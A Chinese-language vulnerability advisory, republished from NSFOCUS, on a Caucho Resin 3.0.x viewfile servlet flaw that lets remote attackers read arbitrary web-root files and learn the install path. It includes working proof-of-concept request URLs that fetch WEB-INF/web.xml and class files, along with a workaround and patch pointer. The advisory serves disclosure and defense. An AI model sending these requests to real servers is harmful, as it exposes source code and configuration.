Caucho Resin viewfile远程文件及路径泄露漏洞

来源:百度文库 编辑:神马文学网 时间:2024/05/06 11:36:05
转自:绿盟科技
原文地址:http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=8828
发布日期:2006-05-16
更新日期:2006-05-17
受影响系统:Caucho Technology Resin v3.0.18
Caucho Technology Resin v3.0.17
Caucho Technology Resin v3.0.16
Caucho Technology Resin v3.0.15
Caucho Technology Resin v3.0.14
Caucho Technology Resin v3.0.13
Caucho Technology Resin v3.0.12
Caucho Technology Resin v3.0.11
Caucho Technology Resin v3.0.10不受影响系统:Caucho Technology Resin v3.0.19描述:BUGTRAQ  ID:18007
Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windows操作系统下。
Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。
默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight
viewfile servlet可以无需参数在Web主目录中浏览任意文件:
http://targetsystem/resin-doc/viewfile/?file=index.jsp
攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:
http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:
http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
请求中错误的路径还会泄漏安装的绝对路径:
File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class
<*来源:Joseph Pierini (joep@scanalert.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114780293620632&w=2
*>
测试方法:警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
http://www.example.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
建议:临时解决方法:
* 从生产系统中删除resin-doc.war文件,不要使用默认的配置文件部署。
厂商补丁:
Caucho Technology
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.caucho.com/download/